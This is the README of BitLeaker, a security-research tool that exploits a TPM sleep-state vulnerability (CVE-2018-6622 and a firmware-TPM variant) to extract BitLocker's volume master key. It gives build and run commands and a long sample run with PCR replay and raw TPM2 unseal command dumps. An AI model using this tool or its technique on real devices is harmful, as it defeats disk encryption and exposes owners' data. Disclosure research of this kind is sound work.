kkamagui / bitleaker

This tool can decrypt a BitLocker-locked partition with the TPM vulnerability

License: Other

Makefile 0.59% C 16.72% Python 75.68% Shell 7.01%
blackhat cve-2018-6622 tpm-20 blackhateurope-2019

bitleaker's Introduction

                                                     ,║▒▒▒▒▒▒@╖
                                                    ╥▒▒╝    ▒▒▒╢
                                                   ]▒▒╢      ]▒▒╢
                                                   ]▒▒▒      j▒▒╢
                               ,                 ,╖║▒▒▒         
                 ,╓╖,  ╓@╬@╥╥╬╣╢╢▓▓            ╖▒╖▒╙▒▒▒░░░▒░▒▒▒▒.
             ║╬@▓╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢[           ╜╜╜╢╢▒▒░░░░░░▒@▓▓▄▒▒▒▒╖
             ╢╢╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢[           ░░░░░╙╢▓╣╬▓▓@@▓▓@░░æ▓▓▓[
             ╢╢╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢..[           ░░░░░ ░▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒H
             ╢                    ╢`           ░░░░░░░▒▒▒▒▒▒▒▒▒▒╢▒▒╢╢╢[
             ..╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢            ░░░░░░░▒▒▒▒▒▒▒▒▒▒╢╢╢╢╢╢[
             ╢╢╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢[      ¿░░░,░░░░░░░▒▒▒▒▒▒▒▒▒▒╢╢╢╢╢╢[
             ╢╢╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢░░░░░░░░░░░░╣▓▓@░░░▒▒▒▒▒▒▒▒▒▒╫╣╣╣▓▓[
               ╙╙   ╙╬ ╨╜╙╬╢╢╢╣╣╢╢╢░░░░░░░░░░░░░░░░╫▓@▓▓▓▒▒▒▒▒▒▒▓▓▓▓▓▓[
                  ,,, ,░░░░░░░░░░╙╨░░░░░░░░░░░░░░░░░░▓▒▒▒▓▓▓▓▓▓▓▓▓▓▓▀"`
             ,,.░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░]▒░░░╙╢▒▓╣▓▒▒▒▒  ]
             ▐▓█████▄░░░░▒░░░░░░░░░░░░░░░░░░░░░░░░░░╟▒▒▒▒▒▒▒▒▒╣▓╢╢╢ ░░
             ▐▓▓██████████▄░░░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▓╢▒▒▒▒╢▓╢╢▒┌░░
             ▐▓▓█████████████████▄░░░▒▒░░▒▒▒▒▒▒▒╢╢╢╢╢╢Ñ▒▒▓╢▒▒▒▒▓╣╢╜▒░░
             ╜▓▓██▀████████████████▌║▒▒▒▒╢╢╢╢╣╢╢╢╣╣╣╣╣╣╣╝╣▒▒╢▓"    ▒░░
             ` "╙``╙╣▀█▀▀██████████▌╢╢╢╢╢╢╢╣╣╣╣╣╢Ñ╜╨Ñ╝`    ╙  ,,   ▒▒▒
                      "` "╨╢▀▀▓▓███▌╢╣╣╣╣╣╣╜╜╨╨╜      ▄, ░░   ,▌ ░░▒▒▒
              ░   e             ╙╣▓▌Ñ╜╙╙╜`            ▌▓ ░░░  ░░░░░▒▒▒
              ░░░░╧╤░░░    ,       ,         ▐░ ░░░░  ░░░░░░░░█▐░▒░▒▒▒
              ░░░░,░░░░░░  ▐,     j▌█    ░ ░░░░░░░░░░░▐░░▒░░░░░░░▒░▒▒▒
              ░░░░▌█░░░░░░░░░░░░ ░░░░░░░░░░░░╪░░░░░░░░░░░▒░░▒░▒▌▒▒▒▒▒▒`
             ▒▒▒▒░▒▒▒▒▒▒░░æ▄▒░▒▒░░æ▄▒▒▒▒▒▒▒▒▌▓▒▒▒▒▒▒▒æ▒▒▒▒▒▒▒▓▓▒▒▒▒▒▒
             ]▒▒▒▒░▒▒▒▒▒▒▒▒╬▒▒▒▒▒▒▒╬▒▒▒▒▒▒▒▒▒▐▌▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░
             └ ▒░░▒▒▒▒▒░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒]▒░▒▒░▒░▒▒▒░▒▒▒░░░ ░░░; ░░
               ▒░░▒▒░▒║░▒▒▒▒▒▒░▒▒▒▒▒░▒]▒▒]░░▒▒░░ ░░▒░▒░▒░░  ░░ ⌡  ░
               ░ ░░▒░▒] ░░▒░▒░░▒▒░]░░▒;▒▒]░░░░ ░ ░░j░░░▒░   ░  !
                 ░▒L░░└   ░░  ░▒ ░ ░░▒!▒▒ ░ ░  ░ ░░└ ░ ▒
                  ▒L░       ░▒  ░ ░      ░ ░ ░ └ ░  

          BitLeaker v1.0 for decrypting BitLocker with One Vulnerability
                Project link: https://github.com/kkamagui/bitleaker

1. Notice

BitLeaker is a new tool for extracting the VMK and mounting a BitLocker-locked partition. BitLeaker uses a TPM vulnerability: CVE-2018-6622 for a discrete TPM and a related vulnerability for a firmware TPM. Both are related to the S3 sleeping state of the Advanced Configuration and Power Interface (ACPI) and can reset the TPM. For detailed information about CVE-2018-6622 and a vulnerability-checking tool, please read our USENIX paper, A Bad Dream: Subverting Trusted Platform Module While You Are Sleeping, and our Black Hat Asia presentation, Finally, I Can Sleep Tonight: Catching Sleep Mode Vulnerabilities of the TPM with Napper.

1.1. Presentation, Paper, and Demo

BitLeaker and related materials were introduced at the security conferences below.

You can watch the demo video below.

  • BitLeaker v1.0 Demo

1.2. Contributions

We always welcome your contributions. If you have any other ideas, feel free to contact us.

1.3. License

BitLeaker is licensed under GPL v2.

2. Introduction to BitLeaker

The Trusted Platform Module (TPM) is a tamper-resistant security module. It has been widely deployed in commercial devices to protect secret data and ensure the trustworthiness of a system. There are two typical types of TPM: the hardware-based discrete TPM (dTPM) and the firmware-based TPM (fTPM). Microsoft Windows uses both types of TPM to protect the Volume Master Key (VMK) of its disk encryption software, BitLocker.

BitLocker's TPM feature has not been analyzed in detail. It has stayed hidden behind the TPM because the TPM protects BitLocker's VMK with its sealing and unsealing functions. Most security researchers concluded that a VMK sealed by the TPM was safe. Recent works also showed that the only way to extract the VMK from the TPM was physical access, such as probing the Low Pin Count (LPC) bus or the TPM pins. However, we found a novel way to subvert BitLocker with software only.

We introduce a sleep mode vulnerability of the dTPM and fTPM that can subvert BitLocker. We also introduce a new tool, BitLeaker, that can extract the VMK from the TPM and decrypt a BitLocker-locked partition without physical access. Last year, we already introduced a dTPM vulnerability, CVE-2018-6622. However, this year we found that the same vulnerability exists in the fTPM, specifically Intel Platform Trust Technology (PTT). The sleep mode vulnerability can subvert not only the fTPM but also the dTPM through the S3 sleeping state of the Advanced Configuration and Power Interface (ACPI), and it can forge Platform Configuration Registers (PCRs). PCRs are the core of the sealing and unsealing functions that protect BitLocker's VMK. By exploiting the vulnerability, we extracted the VMK from the TPM and decrypted a BitLocker-locked partition with our custom tool, BitLeaker.

3. How to Use the BitLeaker Tool

BitLeaker consists of the BitLeaker bootloader, the BitLeaker kernel module, the BitLeaker launcher, a customized TPM2-TSS, and TPM2_tools. It is based on Ubuntu 18.04, and you can make a live CD with Ubuntu and BitLeaker.

3.1 Install Ubuntu 18.04 with UEFI mode and Clone BitLeaker Source Code

=== Caution ===

If you don't use UEFI mode, BitLeaker will not work!

If you want to use the bitleaker.desktop app icon, please set the user ID to bitleaker and copy the bitleaker.desktop file to the /usr/share/applications directory.

===============

BitLeaker is based on Ubuntu 18.04. Therefore, download it from the official Ubuntu website and install it on your target system in UEFI mode.

After that, clone the BitLeaker source code from the project site, https://www.github.com/kkamagui/bitleaker, and build it with the commands below.

# Clone Bitleaker source code from project site.
$> git clone https://github.com/kkamagui/bitleaker.git

# Build Bitleaker.
$> cd bitleaker
$> ./bootstrap

3.2 Run BitLeaker with a Terminal

After building the source code, you can run the BitLeaker tool from a terminal. Type the command below in your terminal. The BitLeaker front-end is a Python script.

# Run BitLeaker
$> sudo ./bitleaker.py

# If you want to use the bitleaker app icon, copy bitleaker.desktop to /usr/share/applications
$> sudo cp bitleaker.desktop /usr/share/applications

3.3. Test Example

The result below is an example from an Intel NUC8i7HVK. The system has an old BIOS version and an fTPM.

$> sudo ./bitleaker.py 
[sudo] password for bitleaker: 
                                                ,║▒▒▒▒▒▒@╖
                                               ╥▒▒╝    ▒▒▒╢
                                              ]▒▒╢      ]▒▒╢
                                              ]▒▒▒      j▒▒╢
                          ,                 ,╖║▒▒▒
            ,╓╖,  ╓@╬@╥╥╬╣╢╢▓▓            ╖▒╖▒╙▒▒▒░░░▒░▒▒▒▒.
        ║╬@▓╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢[           ╜╜╜╢╢▒▒░░░░░░▒@▓▓▄▒▒▒▒╖
        ╢╢╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢[           ░░░░░╙╢▓╣╬▓▓@@▓▓@░░æ▓▓▓[
        ╢╢╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢..[           ░░░░░ ░▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒H
        ╢                    ╢`           ░░░░░░░▒▒▒▒▒▒▒▒▒▒╢▒▒╢╢╢[
        ..╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢            ░░░░░░░▒▒▒▒▒▒▒▒▒▒╢╢╢╢╢╢[
        ╢╢╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢[      ¿░░░,░░░░░░░▒▒▒▒▒▒▒▒▒▒╢╢╢╢╢╢[
        ╢╢╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢░░░░░░░░░░░░╣▓▓@░░░▒▒▒▒▒▒▒▒▒▒╫╣╣╣▓▓[
          ╙╙   ╙╬ ╨╜╙╬╢╢╢╣╣╢╢╢░░░░░░░░░░░░░░░░╫▓@▓▓▓▒▒▒▒▒▒▒▓▓▓▓▓▓[
             ,,, ,░░░░░░░░░░╙╨░░░░░░░░░░░░░░░░░░▓▒▒▒▓▓▓▓▓▓▓▓▓▓▓▀"`
        ,,.░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░]▒░░░╙╢▒▓╣▓▒▒▒▒  ]
        ▐▓█████▄░░░░▒░░░░░░░░░░░░░░░░░░░░░░░░░░╟▒▒▒▒▒▒▒▒▒╣▓╢╢╢ ░░
        ▐▓▓██████████▄░░░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▓╢▒▒▒▒╢▓╢╢▒┌░░
        ▐▓▓█████████████████▄░░░▒▒░░▒▒▒▒▒▒▒╢╢╢╢╢╢Ñ▒▒▓╢▒▒▒▒▓╣╢╜▒░░
        ╜▓▓██▀████████████████▌║▒▒▒▒╢╢╢╢╣╢╢╢╣╣╣╣╣╣╣╝╣▒▒╢▓"    ▒░░
        ` "╙``╙╣▀█▀▀██████████▌╢╢╢╢╢╢╢╣╣╣╣╣╢Ñ╜╨Ñ╝`    ╙  ,,   ▒▒▒
                 "` "╨╢▀▀▓▓███▌╢╣╣╣╣╣╣╜╜╨╨╜      ▄, ░░   ,▌ ░░▒▒▒
         ░   e             ╙╣▓▌Ñ╜╙╙╜`            ▌▓ ░░░  ░░░░░▒▒▒
         ░░░░╧╤░░░    ,       ,         ▐░ ░░░░  ░░░░░░░░█▐░▒░▒▒▒
         ░░░░,░░░░░░  ▐,     j▌█    ░ ░░░░░░░░░░░▐░░▒░░░░░░░▒░▒▒▒
         ░░░░▌█░░░░░░░░░░░░ ░░░░░░░░░░░░╪░░░░░░░░░░░▒░░▒░▒▌▒▒▒▒▒▒`
        ▒▒▒▒░▒▒▒▒▒▒░░æ▄▒░▒▒░░æ▄▒▒▒▒▒▒▒▒▌▓▒▒▒▒▒▒▒æ▒▒▒▒▒▒▒▓▓▒▒▒▒▒▒
        ]▒▒▒▒░▒▒▒▒▒▒▒▒╬▒▒▒▒▒▒▒╬▒▒▒▒▒▒▒▒▒▐▌▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░
        └ ▒░░▒▒▒▒▒░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒]▒░▒▒░▒░▒▒▒░▒▒▒░░░ ░░░; ░░
          ▒░░▒▒░▒║░▒▒▒▒▒▒░▒▒▒▒▒░▒]▒▒]░░▒▒░░ ░░▒░▒░▒░░  ░░ ⌡  ░
          ░ ░░▒░▒] ░░▒░▒░░▒▒░]░░▒;▒▒]░░░░ ░ ░░j░░░▒░   ░  !
            ░▒L░░└   ░░  ░▒ ░ ░░▒!▒▒ ░ ░  ░ ░░└ ░ ▒
             ▒L░       ░▒  ░ ░      ░ ░ ░ └ ░

    BitLeaker v1.0 for decrypting BitLocker with the TPM vulnerability
           Project link: https://github.com/kkamagui/bitleaker 

Search for BitLocker-locked partitions.
    [>>] BitLocker-locked partition is [/dev/nvme0n1p4]

Loading BitLeaker kernel module... Success
Entering sleep...
    [>>] Please press any key or power button to wake up...
Waking up...
    [>>] Please press any key to continue...

Preparing PCR data.
    [>>] Get PCR data from BitLeaker driver... Success

Cut and extract essential PCR data.
    [>>] Extract PCR numbers and SHA256 hashes... Success

Replay TPM data.
    [>>] Checking the resource manager process... Success

... omitted ...

    [>>] PCR 7 , SHA256 = ccfc4bb32888a345bc8aeadaba552b627d99348c767681ab3141f5b01e40a40e
PCR Num 7
ccfc4bb32888a345bc8aeadaba552b627d99348c767681ab3141f5b01e40a40e

Bank/Algorithm: TPM_ALG_SHA256(0x000b)
PCR_00: f4 7c a8 7c 43 ed b5 1f 72 f7 21 21 d1 4f 28 b2 db 37 a6 d4 d7 7a c1 f2 cc c1 4b 32 5f da 8b ac
PCR_01: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_02: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_03: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_04: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_05: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_06: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_07: e5 8a da 1b a7 5f 2e 47 22 b5 39 82 45 98 ad 5e 10 c5 5f 2e 4a ea b2 03 3f 3b 0a 8e e3 f3 ec a6
PCR_08: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_09: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_11: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_12: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_13: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_14: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_15: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_16: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_17: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_18: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_19: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_20: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_21: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_22: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_23: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

    [>>] PCR 7 , SHA256 = 78684298cc54cf7550bd38d3c378eeee59d3ae027632cda6f507ac5ccd257b35
PCR Num 7
78684298cc54cf7550bd38d3c378eeee59d3ae027632cda6f507ac5ccd257b35

Bank/Algorithm: TPM_ALG_SHA256(0x000b)
PCR_00: f4 7c a8 7c 43 ed b5 1f 72 f7 21 21 d1 4f 28 b2 db 37 a6 d4 d7 7a c1 f2 cc c1 4b 32 5f da 8b ac
PCR_01: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_02: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_03: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_04: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_05: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_06: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_07: f1 fe 22 30 a9 50 85 ba f7 23 f5 36 d2 2a e8 af b8 23 ae 9c 35 5e f0 8f d8 5a 27 3c 4d 8b 17 f4
PCR_08: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_09: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_11: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_12: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_13: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_14: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_15: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_16: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_17: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_18: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_19: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_20: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_21: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_22: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_23: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

... omitted ...

    [>>] Last PCR 7, SHA256 = 30bf464ee37f1bc0c7b1a5bf25eced275347c3ab1492d5623ae9f7663be07dd5
PCR Num 7
30bf464ee37f1bc0c7b1a5bf25eced275347c3ab1492d5623ae9f7663be07dd5

Bank/Algorithm: TPM_ALG_SHA256(0x000b)
PCR_00: e3 af a3 d7 72 16 ce f7 ca f4 3b f6 ca 88 83 48 06 56 01 3f 4b 6b c3 7b 29 ca aa ed b2 a6 33 96
PCR_01: 51 4a e7 aa f6 82 3a 4c c1 1a c8 17 73 ac a4 19 4c ca dc 07 31 58 d1 1a 67 ef c8 f7 9d 75 a9 0f
PCR_02: 85 f6 3d 95 59 75 fb d1 ca 4e 93 4b 32 b9 3b f9 3f 4d 68 5f cb b4 3f e5 80 05 51 69 b7 57 fd 6e
PCR_03: 3d 45 8c fe 55 cc 03 ea 1f 44 3f 15 62 be ec 8d f5 1c 75 e1 4a 9f cf 9a 72 34 a1 3f 19 8e 79 69
PCR_04: 3d 45 8c fe 55 cc 03 ea 1f 44 3f 15 62 be ec 8d f5 1c 75 e1 4a 9f cf 9a 72 34 a1 3f 19 8e 79 69
PCR_05: c7 02 7a ef 3a 65 5b 76 5c ad c6 69 2f 9e 81 13 7b 41 76 c3 20 a7 4f c9 d6 30 b3 da cc b6 c5 5a
PCR_06: 3d 45 8c fe 55 cc 03 ea 1f 44 3f 15 62 be ec 8d f5 1c 75 e1 4a 9f cf 9a 72 34 a1 3f 19 8e 79 69
PCR_07: f6 dd c2 72 1f 58 23 76 90 ff 44 e6 0c 41 18 a9 f3 6d 88 dd ee 64 8c f2 f0 a9 77 74 4e a9 2d 6c
PCR_08: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_09: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_11: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_12: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_13: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_14: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_15: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_16: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR_17: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_18: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_19: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_20: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_21: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_22: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
PCR_23: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Preparing TPM data.
    [>>] Get TPM-encoded blob from dislocker... Success
    [>>] Convert TPM-encoded blob to hex data... Success
    [>>] Create TPM2_Load data... Success
    [>>] Create TPM2_StartSession data... Success
    [>>] Create TPM2_PolicyAuthorize data... Success
    [>>] Create TPM2_PolicyPCR data... Success
    [>>] Create TPM2_Unseal data... Success

Execute TPM commands
    [>>] Execute TPM2_Load... Input file tpm2_load.bin
Initializing Local Device TCTI Interface
    [*] Input Size 247
00000000  80 02 00 00 00 f7 00 00  01 57 81 00 00 01 00 00  |.........W......|
00000010  00 09 40 00 00 09 00 00  00 00 00 00 8a 00 20 b7  |..@........... .|
00000020  3f 86 88 16 00 33 91 70  d2 63 d4 0e 94 58 ee a9  |?....3.p.c...X..|
00000030  ac f4 6c cd da 0d a2 e7  7c 0f 66 7d ac fe f6 00  |..l.....|.f}....|
00000040  10 ae fc 34 82 87 63 18  bf f6 6d 24 95 f2 0b 7f  |...4..c...m$....|
00000050  de 01 28 d4 2c a4 7b 4b  95 f2 51 a2 44 46 89 44  |..(.,.{K..Q.DF.D|
00000060  94 70 f7 f0 f5 9b d0 4c  01 40 71 21 fe 4b af 82  |.p.....L.@q!.K..|
00000070  8a cd aa 4c 2b 76 a4 46  17 db 49 2f d1 bb 9b 41  |...L+v.F..I/...A|
00000080  4f 83 89 01 24 f6 9e db  f8 0a d6 5d 45 63 41 e5  |O...$......]EcA.|
00000090  29 b4 0e 8e f0 44 a5 52  75 bf 12 c1 85 ad 79 31  |)....D.Ru.....y1|
000000a0  79 5e 60 61 cd 99 f9 00  4e 00 08 00 0b 00 00 04  |y^`a....N.......|
000000b0  12 00 20 6f b5 05 0c 0a  64 e6 ff 2e 0a f1 8e 9c  |.. o....d.......|
000000c0  d8 26 40 87 44 b0 f2 08  4a bc a9 c7 cd 7e 72 17  |.&@.D...J....~r.|
000000d0  de cc f0 00 10 00 20 54  4a d5 bc 0f ec ca db 9c  |...... TJ.......|
000000e0  b1 56 8e be 6f 9a 3b 25  2f d9 37 9f 3e b1 e1 98  |.V..o.;%/.7.>...|
000000f0  f7 48 cd 93 c2 82 51                              |.H....Q|

    [*] Output Size 59, Result: Success
00000000  80 02 00 00 00 3b 00 00  00 00 80 00 00 01 00 00  |.....;..........|
00000010  00 24 00 22 00 0b 70 63  1d 68 87 fb 16 55 bd 3e  |.$."..pc.h...U.>|
00000020  71 c6 7b 02 17 2c 2c 33  c7 00 fa 45 9c 1e 1c 7d  |q.{..,,3...E...}|
00000030  b2 91 fc b4 7f 86 00 00  01 00 00                 |...........|
    [>>] Success

    [>>] Execute TPM2_StartSession... Input file tpm2_startsession.bin
Initializing Local Device TCTI Interface
    [*] Input Size 59
00000000  80 01 00 00 00 3b 00 00  01 76 40 00 00 07 40 00  |.....;...v@...@.|
00000010  00 07 00 20 e3 4c e2 d5  48 7f 73 97 b2 8d b4 e7  |... .L..H.s.....|
00000020  93 de 4c 36 91 8a a5 1f  3b 48 0c 1f 7f 75 79 c5  |..L6....;H...uy.|
00000030  ee fa a9 83 00 00 01 00  10 00 0b                 |...........|

    [*] Output Size 48, Result: Success
00000000  80 01 00 00 00 30 00 00  00 00 03 00 00 00 00 20  |.....0......... |
00000010  20 cf 43 fd 28 52 c0 e9  91 2f d8 10 e5 f7 20 4d  | .C.(R.../.... M|
00000020  7e 0e dc ce 5c 97 97 71  06 7a af ee cc 45 b2 10  |~...\..q.z...E..|
    [>>] Success

    [>>] Execute TPM2_PolicyAuthorize... Input file tpm2_policyauthorize.bin
Initializing Local Device TCTI Interface
    [*] Input Size 14
00000000  80 01 00 00 00 0e 00 00  01 6b 03 00 00 00        |.........k....|

    [*] Output Size 10, Result: Success
00000000  80 01 00 00 00 0a 00 00  00 00                    |..........|
    [>>] Success

    [>>] Execute TPM2_PolicyAuthorize... Input file tpm2_policypcr.bin
Initializing Local Device TCTI Interface
    [*] Input Size 58
00000000  80 01 00 00 00 3a 00 00  01 7f 03 00 00 00 00 20  |.....:......... |
00000010  5f f5 9b 8f b8 7c 48 dc  43 68 60 eb a2 70 cc a2  |_....|H.Ch`..p..|
00000020  22 4e 7b b9 f0 83 ed fe  78 91 fa ed e2 b4 de 5a  |"N{.....x......Z|
00000030  00 00 00 01 00 0b 03 80  08 00                    |..........|

    [*] Output Size 10, Result: Success
00000000  80 01 00 00 00 0a 00 00  00 00                    |..........|
    [>>] Success

    [>>] Execute TPM2_Unseal... Input file tpm2_unseal.bin
Initializing Local Device TCTI Interface
    [*] Input Size 27
00000000  80 02 00 00 00 1b 00 00  01 5e 80 00 00 01 00 00  |.........^......|
00000010  00 09 03 00 00 00 00 00  00 00 00                 |...........|

    [*] Output Size 97, Result: Success
00000000  80 02 00 00 00 61 00 00  00 00 00 00 00 2e 00 2c  |.....a.........,|
00000010  2c 00 00 00 01 00 00 00  03 20 00 00 10 c7 ea 90  |,........ ......|
00000020  6d 6d a4 82 1f 96 cc 81  66 06 e9 12 fa 04 56 b3  |mm......f.....V.|
00000030  5a 5c 11 61 fc c5 aa 74  6a 23 f5 4b 00 20 34 5a  |Z\.a...tj#.K. 4Z|
